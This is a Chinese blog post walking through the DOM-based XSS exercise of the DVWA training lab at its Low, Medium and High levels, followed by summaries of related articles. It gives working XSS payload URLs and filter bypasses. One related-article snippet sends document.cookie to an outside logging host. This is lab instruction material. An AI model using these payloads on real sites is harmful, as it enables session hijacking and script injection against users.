DVWA DOM型XSS

最新推荐文章于 2025-09-12 20:21:26 发布
原创 最新推荐文章于 2025-09-12 20:21:26 发布 · 473 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web

博客介绍了DVWA上DOM型XSS与反射型和存储型XSS的不同,其需在URL上实施攻击。分别阐述了Low、Medium、High三个级别的攻击方式,如Low级别无防护可直接输入URL;Medium级别可构造URL绕过检查机制;High级别可用#注释符绕过检测。

前言

DVWA上的DOM型XSS与反射型和存储型XSS不同,页面上是没有输入的,所以要直接在URL上实施攻击

一、Low

low级别的代码什么防护都没有,因此直接输入URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=<script>alert('xss')</script>

在这里插入图片描述

二、Medium

Medium级别的代码增加了检查机制,如果输入当中有“<script”就把default设为English阻止XSS注入。但我们可以通过插入其它语句来达到我们的目的。在这里插入图片描述
我们可以构造URL:
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><img src=1 οnerrοr=alert('xss')>
先闭合option再闭合select

在这里插入图片描述
如果页面上显示的是一张失败的图片但没有弹窗的话可以更换URL
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><svg/onload=alert(1)>或者
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><iframe src="javascript:alert(1)"></iframe>

在这里插入图片描述
查看页面源代码可以看到我们的代码已经插入进去了,闭合了select标签后执行在这里插入图片描述

三、High

High级别的代码用了一个switch表使我们只能提交规定的内容,但是#注释符可以让服务器端无视#后面的代码从而绕过检测。构造URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
这样这段代码就是写在本地的,每次在下方重新选择language后都会触发这个XSS。而且这段代码不会像low和high一样保存在页面源代码里。

在这里插入图片描述
在这里插入图片描述

scrawman
关注
DVWADOMXSS
qq_39682037的博客
03-19 2502
DOMXSS 是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触发不需要经过服务器端,也就是说,服务端的防御并不起作用。 Security Level: low 源码 <?php # No protections, anything goes ?> 分析 什么限制都没有,大胆尝试 进行下方的实验 发现在url的default写什么页面便生成什...
DVWA】--- 十一、DOMXSS(XSS DOM)
qq_43168364的博客
05-31 436
XSS DOM 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法
DVWA--DOMXSS(初中高)
firecjh的博客
06-09 594
2)在界面出现弹框,弹框内容为本人姓名拼音。(使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。选择“View Source”查看源程序,发现对参数进行了判断,如果不是选项,则使用默认的参数“English”。使用> 进行参数闭合,再添加DOM标签参数进行XSS注入。
DVWA攻略-05-XSS-DOM/反射/存储
Xor0ne
07-16 995
参考文献: DVWA靶场-XSSDOM、反射、存储) 文章目录9.DOM-xss9.1、low9.2、medium9.3、high9.4、impossible10.Reflected XSS10.1、low10.2、medium10.3、high10.4、impossible11.Stored-xss11.1、low11.2、medium11.3、 high11.4、impossible 9.DOM-xss DOM,文档对象模(Document Object Model),是W3C组织推荐的处
DVWAXSS
谢公子的博客
08-05 2103
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSSDOMXSS由于其特殊性,常...
DVWAXSSDOM
RexHa的博客
10-06 2473
dvwa XSSDOM
DVWA靶场XSS DOMLOW级别演示举例
2301_77185537的博客
12-24 559
因此尝试修改URL中的default值,使它等于经典的XSS脚本payload网页弹窗。:因此我们查看网页前端的源代码,因为处理用户输入的只有前端的JavaScript代码。能够调出网页弹窗,也就能说明我们注入其他恶意的JavaScript代码也是没有问题的。:查看网站后台的PHP源代码,发现服务器端没有任何的PHP限制。:首先打开DVWA靶场XSS DOM 模块。靶场XSS DOM模块举例。
DVWA靶场XSS漏洞全解析:从DOM、反射到存储
最新发布
Java程序员_编程开发学习笔记_网站安全运维教程_渗透技术教程
09-12 1089
本文全面解析了DVWA靶场中的XSS漏洞,包括DOM、反射和存储三种类。通过四个安全级别(Low到Impossible)的漏洞分析,展示了XSS攻击原理、利用方法及相应的防御措施。重点阐述了存储XSS的危害性,详细介绍了各安全级别的绕过技巧,并总结了有效的防护方案,包括输入验证、输出编码、CSP策略和HttpOnly Cookie设置等。文章强调XSS防御的关键在于输出编码和持续的安全审计,为开发者提供了系统的安全实践指导。
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1625
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
玩转DVWAXSS DOM
key01362000的博客
09-29 1251
DVWAXSS DOM攻击
DVWA系列】十、XSS(DOM) 基于DOMXSS(源码分析&漏洞利用)
Pluto.的博客
03-12 1643
文章目录DVWAXSS(DOM) 基于DOM的跨站脚本攻击一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(DOM) 基于DOM的跨站脚本攻击 一、Low 级别 没有任何的安全保护措施 下拉框选择语言提交后,在url栏中的default参数直接显示: 构造XSS代码,修改参数,成功执行脚本: ?default=<script>alert('/xss/')</script> 查看网页源代码,脚本插入到代码中,所以执行了
DVWA靶场通关——DOMXSS漏洞
sucker的博客
11-29 3506
DOMXSSDOM-based Cross-Site Scripting,DOM XSS)是一种跨站脚本攻击(XSS)的变种,它与传统的反射XSS(Reflected XSS)或存储XSS(Stored XSS)有所不同,主要是发生在客户端(浏览器端),并且依赖于网页中动态的文档对象模DOM)结构。:如果页面存在涉及状态更改的操作(如修改密码、删除内容等),而没有对请求进行适当的防护(例如 CSRF token),攻击者可以利用该漏洞执行伪造的操作,导致用户的会话受到攻击。
DVWA DOM-XSS
老司机开代码的博客
09-02 435
文章目录关于DOMlowmediumhighimpossible 关于DOM 因为自己还没有深入,系统的学习js和html。因此对于DOM的理解也不深入,就目前个人的认识,DOMXSS是利用浏览器访问DOM对象,修改网页html结构,从而达到xss注入。等以后详细的学习了,再把这个介绍补上。 这里推荐一篇有关DOM-XSS介绍的文章: DOM-XSS攻击原理与防御 low low级别,没有防护。 但是这里的输入框是一种选择类的框框,无法在输入框中构造payload。但是通过观察可以发现,输入框所选择
一、详解 DVWA_DOMXSS
在下小黄的博客
05-22 1950
第一篇,DVWA_DOMXSS详解
DVWA XSS DOM
m0_56107268的博客
04-30 1243
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
dvwa学习笔记——domxss
weixin_45082914的博客
08-18 576
三、domxss DOM xss是基于dom文档对象模,前端脚本通过dom动态修改页面,由于不与服务端进行交互,而且代码是可见的,从前端获取dom中的数据在本地执行。 常见的可以操纵dom的对象:URL,localtion,referrer等。 low源码: dvwa下的domxss页面的意思是选择一种语音,只在前端执行,且代码并未对default进行处理 漏洞分析与利用: 源码并未做任何安全防护措施,所以可以直接在url上构造攻击脚本 构造脚本: ...dvwa/vulnera
DVWA-DOM XSS
七月_的博客
10-25 858
文章目录DOM XSS (Low)代码分析漏洞利用DOM XSS(Medium)代码分析漏洞利用绕过DOM XSS(High)代码分析漏洞利用 DOM XSS (Low) vulnerabilities/xss_r/source/low.php 代码分析 无任何过滤 漏洞利用 输入,成功弹框: DOM XSS(Medium) 代码分析 漏洞利用 绕过 DOM XSS(High) 代码分析 漏...
DVWA靶场通关笔记-DOMXSS(High级别)
mooyuan的网络安全博客
07-13 1418
DVWA(Damn Vulnerable Web Application)中的 XSS DOM关卡是用于练习和演示 DOM XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高等级别(High)关卡进行渗透实战。
【网络安全】DVWAXSSDOM)攻击姿势及解题详析合集
热门推荐
等风来
05-16 1万+
标签用于在 HTML 页面中嵌入 JavaScript 脚本代码,通过在浏览器中执行这些脚本来实现一些与用户交互、数据处理、动态效果等相关的功能。1.通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。语句中实现一个白名单机制,将可接受的语言作为取值,所有其他语言都会默认被转换为英语。在客户端被注释,因此注入语句不会被传入服务器端,从而达到注入效果。,则继续进行后续校验;
dvwaDOMxss实验
01-03
### DVWA DOM-based XSS 实验教程 #### 安全设置级别:Low 在低安全级别的配置下,DVWADOM XSS 漏洞非常容易被利用。页面会直接将用户的输入通过 URL 参数传递并立即显示出来。 当访问如下链接时: ```plaintext http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>alert('XSS')</script># ``` 浏览器会在不经过服务器端处理的情况下执行 JavaScript 代码,弹出警告框[^1]。 #### 安全设置级别:Medium 中等级别的防护措施会对特殊字符进行一定程度上的转义,但仍存在绕过方法。攻击者可以尝试使用不同的编码方式来规避检测机制。 例如下面这个请求可能会成功触发漏洞: ```plaintext http://localhost/DVWA/vulnerabilities/xss_d/?default=%27%3E%3Cimg%20src=x%20onerror=alert(1)%3E ``` 这段代码创建了一个带有 `onerror` 事件处理器的 img 标签,在加载失败时触发 alert 函数调用。 #### 安全设置级别:High 高级别保护通常采用更严格的过滤规则以及上下文敏感的输出编码技术。尽管如此,某些复杂的 payload 可能仍然能够找到突破口。 一种可能的方式是利用 HTML 注释标记包裹恶意脚本: ```plaintext http://localhost/DVWA/vulnerabilities/xss_d/?default=<!--%20--%3E%3Csvg/onload=prompt(document.cookie)// --> ``` 此 Payload 使用了注释标签闭合前面未完成的属性定义,并紧接着插入可执行的内容。 #### 安全设置级别:Impossible 在这个最高难度模式下,应用程序实现了充分的安全防御策略,包括但不限于严格验证用户输入、防止任何潜在危险的数据进入渲染流程等手段。因此,在这种环境下几乎不可能实现成功的 DOM 基础的跨站点脚本注入攻击。 为了有效预防此类攻击的发生,开发者应当始终遵循最佳实践原则,比如对所有来自客户端的信息都做适当清理和消毒;同时也要注意区分可信源与不可信源之间的差异对待。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值